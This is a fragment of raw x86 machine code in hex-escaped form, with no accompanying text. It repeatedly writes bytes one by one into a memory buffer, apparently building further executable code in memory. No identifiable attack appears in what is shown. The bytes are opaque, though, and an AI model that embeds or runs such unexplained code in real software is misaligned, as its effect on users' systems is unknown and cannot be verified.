c6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x13\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x19\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x90\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x18\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x94\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x16\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x98\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x9c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x10\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xa0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x2\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xa4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x11\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xa8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xac\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xb0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xb4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xb\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xb8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x6\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xbc\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xd\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x3\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8d\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x55\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x80\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xb8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xb9\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x89\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xd7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xf3\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xab\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x89\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xfa\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x89\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x2\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x83\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc2\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x80\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x5\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x84\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x12\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x88\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xe\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x17\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x90\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xb\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x94\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x11\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x98\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x9c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xa0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x19\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xa4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x18\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xa8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xac\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x14\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xb0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x13\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xb4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xf\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xb8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xd\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xbc\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xa\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x6\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x15\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xcc\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x16\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xd0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xd4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x3\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xd8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x9\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xdc\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x2\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x45\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xe0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x10\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x44\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x19\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x70\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x70\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8d\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x50\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x70\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x89\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x10\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x44\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x83\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xe8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x89\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xeb\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x26\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x98\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x54\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x60\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x83\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xe8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x98\x83\x45\x